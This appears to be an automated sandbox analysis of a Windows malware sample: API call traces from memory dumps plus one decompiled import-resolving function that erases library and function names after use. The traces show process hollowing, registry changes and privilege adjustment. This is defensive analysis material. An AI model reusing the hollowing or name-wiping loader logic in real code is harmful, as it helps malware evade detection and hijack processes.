  • StrRChrA.SHLWAPI(00001000,00000000,0000005C), ref: 001D9CA6
  • lstrcat.KERNEL32(00001000,001EDA23), ref: 001D9CE0
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9D28
  • StrChrA.SHLWAPI(?,0000002E), ref: 001D9D96
  • memcpy.NTDLL(001EB1D4,?,00000000), ref: 001D9DCF
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9DE4
  • CompareFileTime.KERNEL32(?,?), ref: 001D9E0D
  • HeapFree.KERNEL32(00000000,001EB1D4), ref: 001D9E43
  • HeapFree.KERNEL32(00000000,00001000), ref: 001D9E53
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: CloseHandleRegCloseKey$CreateEventDeleteFileGetLastErrorRegOpenKeyResumeThreadSetEventSleepSuspendThread
  • String ID:
  • API String ID: 1489053536-0
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C17A8
  • CloseHandle.KERNEL32(001EAF58), ref: 001C1809
  • DeleteFileW.KERNEL32(00000000,?,?,?,?,00000000), ref: 001C1816
  • GetLastError.KERNEL32(?,?,?,00000000), ref: 001C1820
  • RegCloseKey.ADVAPI32(?,?,?,?,00000000), ref: 001C187D
  • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 001C189C
  • SuspendThread.KERNEL32(00000000), ref: 001C18AA
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001C18BE
  • SetEvent.KERNEL32(00000000), ref: 001C18CB
  • CloseHandle.KERNEL32(00000000), ref: 001C18D2
  • Sleep.KERNEL32(000001F4), ref: 001C18E5
  • ResumeThread.KERNEL32(00000000), ref: 001C1909
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlImageNtHeaderlstrlenwsprintf
  • String ID: W
  • API String ID: 3968678070-655174618
APIs
  • RtlImageNtHeader.NTDLL ref: 001C1A48
  • GetCurrentThreadId.KERNEL32 ref: 001C1A5E
  • GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
  • HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
  • RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
  • wsprintfA.USER32 ref: 001C1B50
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
APIs
  • memset.NTDLL ref: 01B32CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 01B32CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 01B32D14
  • lstrcpyW.KERNEL32(00000000,01B38224), ref: 01B32D29
  • lstrlen.KERNEL32(01B37494,?,?,?,?,?,?,?,?,?,?,01B318D7,?), ref: 01B32D46
  • lstrcpyW.KERNEL32(00000000,01B384B8), ref: 01B32D77
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • wsprintfW.USER32 ref: 01B32DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 01B32DE3
  • CoUninitialize.OLE32 ref: 01B32DF7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: GetLastError$CloseHandleCreateFileGetModuleHandleGetWindowsDirectoryHeapFreeRtlAllocateHeapStrChrWriteFilewsprintf
  • String ID:
  • API String ID: 2627060994-0
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
  • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
  • StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
  • wsprintfA.USER32 ref: 001C15D0
  • CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
  • GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
  • WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
  • GetLastError.KERNEL32 ref: 001C1615
  • CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
  • GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: HeapFree$lstrlenmemcpy$RtlAllocateHeapSwitchToThreadlstrcpy
  • String ID:
  • API String ID: 732536130-0
APIs
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • lstrlen.KERNEL32(?,?,?,00000001), ref: 001C216D
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C218F
  • lstrcpy.KERNEL32(00000020,?), ref: 001C21AE
  • lstrlen.KERNEL32(?), ref: 001C21B8
  • memcpy.NTDLL(?,?,?), ref: 001C21F9
  • memcpy.NTDLL(?,?,?), ref: 001C220C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C224F
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 001C2230
    • Part of subcall function 001C2B66: memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C2B66: CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2B66: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C2B66: GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2275
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2291
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 62
  • API ID: CloseHandle$LocalFreeRtlDeleteCriticalSectionRtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleepWaitForSingleObject
  • String ID:
  • API String ID: 1546928802-0
APIs
  • SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
  • CloseHandle.KERNEL32(?), ref: 001DB86F
  • CloseHandle.KERNEL32(?), ref: 001DB87D
  • RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
  • RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
  • Sleep.KERNEL32(000001F4), ref: 001DB8C1
  • CloseHandle.KERNEL32(?), ref: 001DB8CE
  • LocalFree.KERNEL32(?), ref: 001DB8DC
  • RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: GetLastError$VirtualAlloc$RtlEnterCriticalSectionRtlLeaveCriticalSectionSwitchToThread
  • String ID:
  • API String ID: 2452875170-0
APIs
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB03B
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB05A
  • GetLastError.KERNEL32 ref: 001DB20B
  • GetLastError.KERNEL32 ref: 001DB28D
  • SwitchToThread.KERNEL32(?,?,?,?), ref: 001DB2D2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB308
  • GetLastError.KERNEL32 ref: 001DB317
  • RtlEnterCriticalSection.NTDLL(?), ref: 001DB327
  • RtlLeaveCriticalSection.NTDLL(?), ref: 001DB338
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: memcpy$RtlAllocateHeapmemset$HeapFreelstrcmpi
  • String ID:
  • API String ID: 2612869081-0
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,00000018,001ED278), ref: 001CAC70
  • memset.NTDLL ref: 001CAC81
  • lstrcmpi.KERNEL32(?,?), ref: 001CACC1
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CACEA
  • memcpy.NTDLL(00000000,?,?), ref: 001CACFE
  • memset.NTDLL ref: 001CAD0B
  • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD24
  • memcpy.NTDLL(-00000005,001EC42B,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD3F
  • HeapFree.KERNEL32(00000000,?), ref: 001CAD5C
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: RtlAllocateHeaplstrlen$HeapFree_wcsuprlstrcatlstrcpymemcpy
  • String ID:
  • API String ID: 1573093752-0
APIs
  • lstrlenW.KERNEL32(00000000), ref: 001CB606
  • RtlAllocateHeap.NTDLL(00000000,001EAC82), ref: 001CB61C
  • memcpy.NTDLL(00000000,00000000,001EAC80), ref: 001CB62F
  • _wcsupr.NTDLL ref: 001CB63A
  • lstrlenW.KERNEL32(?,001EAC80), ref: 001CB66C
  • RtlAllocateHeap.NTDLL(00000000,?,001EAC80), ref: 001CB681
  • lstrcpyW.KERNEL32(00000000,?), ref: 001CB697
  • lstrcatW.KERNEL32(00000000,001EC940), ref: 001CB6B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB6C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 33
  • API ID: lstrlen$CloseHandleDeleteFileHeapFreeMapViewOfFileRtlAllocateHeapUnmapViewOfFilewcstombs
  • String ID:
  • API String ID: 3071814901-0
APIs
    • Part of subcall function 001C7262: memset.NTDLL ref: 001C7284
    • Part of subcall function 001C7262: lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
    • Part of subcall function 001C7262: OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
    • Part of subcall function 001C7262: CloseHandle.KERNEL32(?), ref: 001C7331
  • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 001C4D32
  • CloseHandle.KERNEL32(?), ref: 001C4D3E
  • lstrlenW.KERNEL32(00000000), ref: 001C4D58
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C4D69
  • wcstombs.NTDLL ref: 001C4D7A
  • lstrlen.KERNEL32(?), ref: 001C4D87
    • Part of subcall function 001D9462: lstrlen.KERNEL32(-00000002,00000000,?,-00000002,-00000002,?,001C4D99), ref: 001D9472
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • UnmapViewOfFile.KERNEL32(?,?,?,?,00000000,00000001), ref: 001C4DBC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C4DCE
  • DeleteFileW.KERNEL32(?), ref: 001C4DDC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 49
  • API ID: GetTickCountHeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapRtlImageNtHeaderStrRChrlstrlenwsprintf
  • String ID:
  • API String ID: 473458267-0
APIs
  • RtlImageNtHeader.NTDLL(?), ref: 001C165E
  • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
  • GetTickCount.KERNEL32 ref: 001C169C
  • wsprintfA.USER32 ref: 001C16AC
  • RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
  • StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
  • lstrlen.KERNEL32(00000000), ref: 001C1702
  • RegCloseKey.ADVAPI32(?), ref: 001C171E
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 110
  • API ID: GetLastError$CancelIoCloseHandleCreateEventGetOverlappedResultReadFileWaitForMultipleObjectsWriteFile
  • String ID:
  • API String ID: 340323113-0
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
  • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
  • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
  • GetLastError.KERNEL32 ref: 001CB9DD
  • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
  • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
  • CancelIo.KERNEL32(?), ref: 001CBA27
  • CloseHandle.KERNEL32(?), ref: 001CBA37
  • GetLastError.KERNEL32 ref: 001CBA3F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
APIs
  • PathFindFileNameW.SHLWAPI(01B3618C), ref: 01B31246
  • lstrcmpiW.KERNEL32(00000000,?,01B37494), ref: 01B3124D
  • RegOpenKeyExA.ADVAPI32(80000001,01B38080,00000000,00000000,?,?,01B37494), ref: 01B3127E
  • lstrlenW.KERNEL32(?,01B37494), ref: 01B31292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 01B312AA
  • RegQueryValueExW.ADVAPI32(?,00000000,01B37494,00000000,01B37494,?,01B37494), ref: 01B312C9
  • StrStrIW.SHLWAPI(00000000), ref: 01B312E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B312F9
  • RegCloseKey.ADVAPI32(?,?,01B37494), ref: 01B31302
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 97
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID: d
  • API String ID: 307323562-2564639436
APIs
  • memset.NTDLL ref: 001DC393
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
    • Part of subcall function 001D90C0: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D90ED
    • Part of subcall function 001D90C0: SetLastError.KERNEL32(00000000,?,001DC3F5,00000000,?,00010007,00000004,?), ref: 001D90F4
  • ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
  • SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
    • Part of subcall function 001DC212: memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC212: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
    • Part of subcall function 001DC212: WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
    • Part of subcall function 001DC212: SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
  • ResumeThread.KERNEL32(00000004), ref: 001DC4D6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 51
  • API ID: CreateFileGetLastErrorHeapFreeRegCloseKeyRegOpenKey
  • String ID: [FILE]$[FILE]
  • API String ID: 3351174444-3230400787
  • Opcode ID: 033c4394e70e99a6bf63e685e4473468f8b4c093a00da4e8f42c8e7bfe120adf
  • Instruction ID: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
  • Opcode Fuzzy Hash: 85F0DD3A594EC3CFD423249020157BAC805FB412E2CAD2716EA807E1C16F8333192F17
  • Instruction Fuzzy Hash: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D95E9: lstrlenW.KERNEL32(?,00000000,001EAC80,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D95F5
    • Part of subcall function 001D95E9: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D961D
    • Part of subcall function 001D95E9: memset.NTDLL ref: 001D962F
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
  • GetLastError.KERNEL32 ref: 001C3A9B
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
  • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 193527b1eef174f7d3812915e618651906c6adafd0bce5f2d714c946695c6d1b
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: A7F02E4D155F71CAE17D2005187BBAA70C3F39671BD25E9031552B31076991B3292FCC
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;
				intOrPtr _t11; /* temporary used below; missing from the decompiler's declarations */

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44);
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,004015E0,?), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,004015E0,?), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,004015E0,?), ref: 00401431
